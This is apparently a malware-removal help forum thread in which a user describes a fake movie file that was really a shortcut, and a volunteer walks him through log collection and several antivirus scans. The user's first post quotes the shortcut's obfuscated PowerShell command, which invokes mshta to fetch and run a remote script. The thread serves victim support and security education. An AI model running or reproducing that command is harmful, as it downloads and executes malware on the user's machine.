Shortcut disguised as movie

[Topdogmsn]

I downloaded a movie, the file was about 1.7 gb, but when I clicked it, I immediately saw that it was a shortcut to something else. The file size went from 1.7 gb to about 2 kb.

A pop-up window appeared, which I closed instantly.

This line of code was in the shortcut: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $a1=[string][char[]]@(0x48,0x54,0x54,0x70) -replace ' ','';$da=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ' ','';Set-Alias uy $da;$a1+='://shortwww.xyz/hit';uy $a1

I have done some research, where people say it's a Trojan that logs keystrokes and credentials. So far im scanning with malware bytes, which removed some regedits to something called diagnostic task, but I'm not sure if that fixed it.

Is this something I can save or do I need to reinstall windows? Best case would be to get some software that can detect and remove it.

 

I did find a restore point to the day before it happened, and as I can see, the Trojan changes the registry, and system restore, restores the registry, so am I safe or? 

[Maurice Naggar]

Hi,        
My name is Maurice. I will be helping and guiding you, going forward on this case.
Let me know what first name you prefer to go by.

 

We cannot know a thing about this situation .....until we get history data from Malwarebytes plus reports from this pc.   So collecting a report is the first necessary step.

 

Please follow my directions as we go along.  Please do not do any changes on your own without first checking with me. 
If you will be away for more than 3 consecutive days,  do try to let me know ahead of time, as much as possible. 
  
Please only just attach   all report files, etc  that I ask for as we go along.

I would appreciate  getting some key details from this machine in order to help you forward.
 NOTE: The tools and the information obtained is safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system.

Do have patience while the report tool runs.  It may take several minutes.  Just let it run & take its time.  You may want to close your other open windows so that there is a clear field of view.
Download Malwarebytes Support Tool
     

    Once the file is downloaded, open your Downloads folder/location of the downloaded file
    Double-click mb-support-1.6.1.784.exe  to run the report
        You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent.
        
    Place a checkmark next to Accept License Agreement and click Next
Now click the left-hand side pane "I do not have an open support ticket"

    You will be presented with a page stating, "Get Started!"
    Do NOT use the button “Start repair” !   But look instead at the far-left options list in black.

    Click the Advanced tab on the left column
    
    Click the Gather Logs button
    
    A progress bar will appear and the program will proceed with getting logs from your computer.  Please do have patience.  It takes several minutes to gather.
   
    Upon completion, click a file named mbst-grab-results.zip will be saved to your Desktop. Click OK
    Please attach the ZIP file in your next reply.

Please know I help here as a volunteer.  and that I am not on 24 x 7.
Help on this forum is one to one.   Again, please be sure to ONLY attach report files  with your reply (s)  as we go along.  Do not do a copy / paste into main body.
Thank you,
Sincerely.

[Topdogmsn]

Thank you very much.

My name is Mikkel.

I have attached the file you asked for

mbst-grab-results.zip

[Maurice Naggar]

Hello Mikkel.

Thanks for the report file.  What follows is an initial mini-cleanup.

This custom script is for  Topdogmsn   only / for this machine only.

Close and save any open work files before starting this procedure. 

I am sending a  new  custom Fix script which is going to be used by the FRSTENGLISH tool. They will both work together as a pair.

Please RIGHT-click the (attached file named) FIXLIST and select SAVE  link AS and save it directly ( as is) to the  Downloads  folder

The tool named FRSTENGLISH.exe   tool    is already on the Downloads folder
Start the Windows Explorer and then, to the Downloads folder.

RIGHT click on  FRSTENGLISH    and select RUN as Administrator and allow it to proceed.  Reply YES when prompted to allow to run.
  to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
IF Windows prompts you about running this, select YES to allow it to proceed.

IF you get a block message from Windows about this tool......
click line More info information on that screen
and click button Run anyway on next screen.

on the FRSTENGLISH window:
Click the Fix button just once, and wait.

 
PLEASE have lots and lots of patience when this starts. You will see a green progress bar start. Lots of patience. This run here should be fairly quick.
If you receive a message that a reboot is required, please make sure you allow it to restart normally.
The tool will complete its run after restart.
When finished, the tool will make a log ( Fixlog.txt) in the same location from where it was run.

Please attach the FIXLOG.txt with your next reply later, at your next opportunity   

Please do have patience.   We will do more later.

Fixlist.txt

[Topdogmsn]

Thank you again very much for your assistance.
I have attached the Fixlog

Fixlog.txt

[Maurice Naggar]

That is a good run.   Thanks for the log report.   You did fine.

Next, a couple of scans to check the system.  The first will run rather quickly.   The second may take an hour or two or so.

[  1   ]

The Microsoft Safety Scanner  is a free Microsoft stand-alone virus scanner that  can be used to scan for & remove malware or potentially unwanted software from a system.

The download links & the how-to-run-the tool are at this link at Microsoft

https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download

 

Let me know the result of this.

The log is named MSERT.log 

the log will be at  %SYSTEMROOT%\debug\msert.log   which in most cases is

C:\Windows\debug\msert.log

Please attach that log with your reply,  when you get the chance.   No rush.  You can do that at the very end.

[     2     ]

I suggest you start this at some point when you do not need the use of the system.   And that you Close as many opened apps as you can , plus, also Close as many browsers as you can before starting this.

 

I would suggest that you do a scan with a scan tool from ESET  to just only scan the C drive.

 

I would suggest a free scan with the ESET Online Scanner

Go to https://www.eset.com/us/home/online-scanner/

Look on the right side of the page.  Click Scan Now

 

It will start a download of "esetonlinescanner_enu.exe"

 

Save the file to your system, such as the Downloads folder, or else to the Desktop.

 

Go to the saved file, and double click it to get it started.

 

When presented with the initial ESET options, click on "Computer Scan".

Next, when prompted by Windows, allow it to start by clicking Yes

 

When prompted for scan type, Click on Custom scan    ( the choice on far-right side)

 

We want just the C drive to be scanned.

 

In the display "Select custom scan targets"  keep the top 3 lines ticked,  plus the one for the C drive   ( which should be your Windows drive)

 

UN-tick the other drives   ( D, E, F,   etc...)

 

Then click on the blue button "Save and continue"

Select   the radio selection "Enable ESET to detect and quarantine potentially unwanted applications"   and click on Start scan button.

 

Have patience.  The entire process may take an hour or more. There is an initial update download.

There is a progress window display.

You should ignore all prompts to get the ESET antivirus software program.   ( e.g.  their standard program).   You do not need to buy or get or install anything else.

When the scan is completed, if something was found, it will show a screen with the number of detected items.  If so, click the button marked “View detected results”.

Click The blue “Save scan log” to save the log.  Look for it on the bottom left, in blue.

 

If something was removed and you know it is a false finding, you may click on the blue ”Restore cleaned files”  ( in blue, at bottom).

Press Continue when all done.  You should click to off the offer for “periodic scanning”.

 

The goal here is to see if there are suspicious or actual threats on the C drive.

[Topdogmsn]

Is it a quick or a full scan you want me to do with the Microsoft Safety Scanner?

[Maurice Naggar]

A quick scan.

[Topdogmsn]

Here you go

eset.txt msert.log

[Maurice Naggar]

The Safety scanner found 2 files of malware & has removed those.

The ESET Online scanner reported no malware.

 

I  would suggest to download, Save, and then run Malwarebytes ADWCLEANER.

Please close Chrome and all other open web browsers after you have saved the Adwcleaner and before you start Adwcleaner scan.

Adwcleaner  detects factory Preinstalled applications too!

 

Please download  Malwarebytes AdwCleaner  https://downloads.malwarebytes.com/file/adwcleaner
 

Be sure to Save the file first, to your system.  Saving to the Downloads folder should be the default on your system.

 

Go to the folder where you saved Adwcleaner. Double click Adwcleaner  to start it.

At the prompt for license agreement, review and then click on I agree.

 

You will then see a main screen for Adwcleaner. ( if you do not see it right away, minimized the other open windows, so you can see Adwcleaner).

Then click on Dashboard button.

Click the blue button "Scan Now".

 

allow it a few minutes to finish the Scan.   Let it remove what it finds.

NOTE:  When it comes to the section "

Pre-installed applications

 

You can skip that.

Please find and send the Adwcleaner "C" clean report.

In Adwcleaner, click the "Reports" button.  Look at the list of reports for the latest date & type "Clean".

Double Click that line & it will open in Notepad.   Save the file to your system and then Attach that with your reply.

 

That C clean report will be the one with the most recent Date and time at folder  C:\AdwCleaner\Logs

Thanks.  Keep me advised.

 

 

[Topdogmsn]

Here it is

AdwCleaner[C00].txt

[Maurice Naggar]

Thank you for the Adwcleaner report.

Thus far,  we have not seen the 'shortcut'  or some reference to 'powershell'.

How are things at this point on the computer system ?

Did you do a scan today with Malwarebytes for Windows ?

 

What follows is meant as a one=time run.

Run a scan with Malwarebytes.
Start Malwarebytes from the Windows  Start menu.

Click Settings ( gear icon)   at the top right of Malwarebytes window.   We want to see the SETTINGS window.

Then click the SECURITY  tab.
Scroll down and lets be sure the line in SCAN OPTIONs for "Scan for rootkits" is ON
Click it to get it ON  if it does not show a blue-color

Now click the small X  to get back to the main menu window.

Click the SCAN button.
Select a Threat Scan ( which should be the default).

When the scan phase is done, be real sure you Review and have all detected lines items check-marked on each line on the left. That too is very critical.

Then click on Quarantine selected.

 

Be sure all items were removed.     Let it remove what it has detected   ( if anything.).

 

Then, locate the Scan run report;  export out a copy;  & then attach in with your  reply.

See https://support.malwarebytes.com/hc/en-us/articles/360038479194-View-Reports-and-History-in-Malwarebytes-for-Windows-v4

 

Sincerely,

 

[Topdogmsn]

Hi there.
The shortcut file was located on my F drive, but i deleted it after i clicked it.
I did restore my PC to the day before i clicked it, so im hoping it would undo what changes the malware did to my registry
I have attached the log from malwarebytes

threatscan.txt

[Maurice Naggar]

Thanks for that scan report from Malwarebytes.   There is no active malicious malware.

Thanks for the reminder that you did delete the shortcut  & that that was on the F drive.

 

You could, if you are inclined,   scan the F drive using the Windows Defender antivirus.  This next suggested procedure will run Windows defender on the F drive.

The Windows defender can be run from  a elevated Command prompt.   Just remember this here is customized for F drive.

 

On the Windows taskbar ,  on the Windows search box,  type in

cmd.exe

and then look at the entire list of choices, and click on Run as Administrator.

 

It is best to  use COPY & Paste for the following.

At the Command prompt either type or copy/paste the following commands, tap  Enter-key after the command:

 

"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -file f:\

then tap the Enter-key to get that going.

 

You will see this as initial on-screen display

Scan starting ...

 

Have patience during the run.   Wait for this display

Scan finished.

Then look for the bottom line result.   Jot that down for your records.

When all done, you can Close the command-prompt window.

 

Let me know if you need other help.

[Topdogmsn]

CMD is saying:

C:\WINDOWS\system32>"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -file f:\
CmdTool: Failed with hr = 0x80004005. Check C:\Users\Stanley\AppData\Local\Temp\MpCmdRun.log for more information

 

 

MpCmdRun.log

[Maurice Naggar]

Thank you for the log.   Unfortunately,  it is a very very brief summary  that does not have much detail.   However, it seems to me that it did not flag any actual 'malware'.

 

We can do a visual look-see.

From the Start menu, select Settings, then select Update and Security.

Next, look at the left-side menu & select Windows Security

 

Next, In Windows Security section:  Click on the grey button Open Windows Security

.

Now, click on the shield Virus and threat protection

By the way, when you see a green check-mark on your display, it means a good status  and that  protection is on.

 

Look for the line marked "Protection History"  and click that line.   We want to look for the detail of today's last Scan run.

 

 

[Topdogmsn]

There were no history in Virus Protection.
I did manage to do a custom scan of the F drive and it reported no threats 

[Maurice Naggar]

Thank you for the information, plus the screen grab.   This result is very good.

 

At this point, a different tool to scan the pc for viruses & other malware  ( if any ).

Do not click on the small popup mini-window that shows up.   Look for the green color button that says "Download Dr.Web CureIt"  with the down-arrow icon

 

Download Dr.Web CureIt to the desktop. 
The download is nearly 208  MB in size

 

After the download is completed, then close the browser and all other web browsers too.

Use the Windows File Explorer to go to the Downloads folder.

 

doubleclick on  the download file file to start the tool.     ( drweb will randomize the name of the file when you download it )

 

⦁    You will see a screen similar to this:

 
Click the checkbox to participate, and then click on Continue button.

 

⦁    Next

 
Click on Select objects for scanning
⦁    Next

 
Put a checkmark by clicking on all the boxes    EXCEPT for

"Temporary files"

"System restore points"

Do not select Temporary files or System Restore points.

Then click on Start scanning button

⦁    The scan in progress will be shown like this

 

⦁    IF something is detected, you will see a screen similar to this

 

 
For each item "detected", click on the Action column down arrow, like this
 

Your options will be Cure or Ignore

IF you see an item that you are very sure is ok, then un-check the checkbox for that item.
Typically, you will keep the Cure default.

Then click on the Neutralize button.

 

⦁    When the actions are completed, you will see this

 
⦁    Click on the green Open Report line. It will pop-up the report in NOTEPAD.
Save the report to your desktop. The report will be called Cureit.log
⦁    Close Dr.Web Cureit. 
⦁    Reboot your computer to allow files that were in use to be moved/deleted during reboot. 
⦁    After reboot, attach the log Cureit.log you saved previously in your next reply. 

 

Have patience in all this. 

[Topdogmsn]

No threats found

cureit.log

[Maurice Naggar]

Allright !   That is very good.   I believe this system is good to go.

SecurityCheck by glax24    

I would like you to run a tool named SecurityCheck to inquire on the current-security-update  status  of some applications.
Download SecurityCheck by glax24 from here  
and save the tool on the desktop.

If Windows's  SmartScreen block that with a message-window, then
Click on the MORE INFO spot and over-ride that and allow it to proceed.
This tool is safe.   Smartscreen is overly sensitive.

Right-click  with your mouse on the Securitycheck.exe  and select "Run as administrator"   and reply YES to allow to run & go forward
Wait for the scan to finish. It will open in a text file named SecurityType.txt. Close the file.  Attach it with your next reply.
You can find this file in a folder called SecurityCheck, C:\SecurityCheck\SecurityCheck.txt
 

[Topdogmsn]

SecurityCheck.txt

[Maurice Naggar]

Thanks for the report.   You want to check about updates for 2 of the apps on this machine.

K-Lite Codec Pack 3.2.0 Full v.3.20 Warning! Download Update

WinRAR 5.50 (64-bit) v.5.50.0 Warning! Download Update

 

We can wrap up this case.  What follows is a cleanup on the tools used.

To remove the FRST  tool & its work files, do this.  Go to your Downloads folder.  Do a RIGHT-click on FRSTENGLISH.exe & select RENAME & then change it to UNINSTALL.exe .
Then run that ( double click on it)  to begin the cleanup process.

 

Delete SecurityCheck.exe

Delete msert.exe

Delete the ESET download     esetonlinescanner_enu.exe

Delete the DrWeb CureIt download file

Delete the mb-support-1.6.1.784.exe 

Delete the mbst-grab-results.zip   on the Desktop

,

 

Backup is your best friend.  Keep backups of your system on a regular basis to offline storage & keep those safe. https://forums.malwarebytes.com/topic/136226-backup-software/

It is not enough to just have a security program installed. Each pc user needs to practice daily safe computer and internet use.

Best  practices & malware prevention:
Follow best practices when browsing the Internet, especially on opening links coming from untrusted sources.
First rule of internet safety: slow down & think before you "click".
Never click links without first hovering your mouse over the link and seeing if it is going to an odd address ( one that does not fit or is odd looking or has typos).

Free games & free programs are like "candy". We do not accept them from "strangers".

Never open attachments that come with unexpected ( out of the blue ) email no matter how enticing.
Never open attachments from the email itself. Do not double click in the email. Always Save first and then scan with antivirus program.

Pay close attention when installing 3rd-party programs. It is important that you pay attention to the license agreements and installation screens when installing anything off of the Internet. If an installation screen offers you Custom or Advanced installation options, it is a good idea to select these as they will typically disclose what other 3rd party software will also be installed.
Take great care in every stage of the process and every offer screen, and make sure you know what it is you're agreeing to before you click "Next".

Use a Standard user account rather than an administrator-rights account when "surfing" the web.
See more info on Corrine's SecurityGarden Blog http://securitygarden.blogspot.com/p/blog-page_7.html
Dont remove your current login. Just use the new Standard-user-level one for everyday use while on the internet.

 
Do a Windows Update.

Make certain that Automatic Updates is enabled.
https://support.microsoft.com/en-us/help/12373/windows-update-faq

Keep your system and programs up to date. Several programs release security updates on a regular basis to patch vulnerabilities. Keeping your software patched up prevents attackers from being able to exploit them to drop malware.

For other added tips, read "10 easy ways to prevent malware infection"

 

Stay safe.  I wish you all the best.   😎

Sincerely,

Maurice

[Maurice Naggar]

Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Please review the following for Tips to help protect from infection

Thank you